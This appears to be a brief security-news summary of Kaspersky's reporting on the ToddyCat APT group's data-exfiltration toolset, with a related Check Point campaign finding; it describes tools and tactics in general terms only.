October 13, 2023 at 08:30AM
The APT actor ToddyCat has been linked to new malicious tools used for data exfiltration, providing insight into their tactics. Kaspersky discovered the group last year, connecting it to attacks on high-profile entities in Europe and Asia. The tools include loaders, a Trojan, a file collection tool, a Dropbox uploader, and an exfiltration tool. ToddyCat also uses custom scripts and compromised credentials for espionage activities. This disclosure coincides with Check Point’s report on a separate campaign targeting government and telecom entities in Asia, which shares infrastructure with ToddyCat.
Key takeaways from the meeting notes:
– ToddyCat, an advanced persistent threat (APT) actor, has been linked to a new set of malicious tools designed for data exfiltration.
– Kaspersky first revealed ToddyCat last year and connected the group to attacks against high-profile entities in Europe and Asia over a three-year period.
– In addition to the previously identified Ninja Trojan and Samurai backdoor, ToddyCat has developed and maintained other software for persistence, file operations, and loading additional payloads.
– The new tools include loaders to launch Ninja Trojan, LoFiSe to find and collect files, a DropBox uploader for saving stolen data, and Pcexter for exfiltrating archive files to OneDrive.
– ToddyCat also uses custom scripts for data collection, a passive backdoor that receives commands via UDP packets, Cobalt Strike for post-exploitation, and compromised domain admin credentials for lateral movement.
– The actor sometimes executes scripts on remote hosts using remote task execution and manually transfers collected files to exfiltration hosts via xcopy utility.
– Check Point recently discovered an ongoing campaign targeting government and telecom entities in Asia using “disposable” malware. The infrastructure used in this campaign overlaps with ToddyCat’s infrastructure.
For more exclusive content, follow us on Twitter and LinkedIn.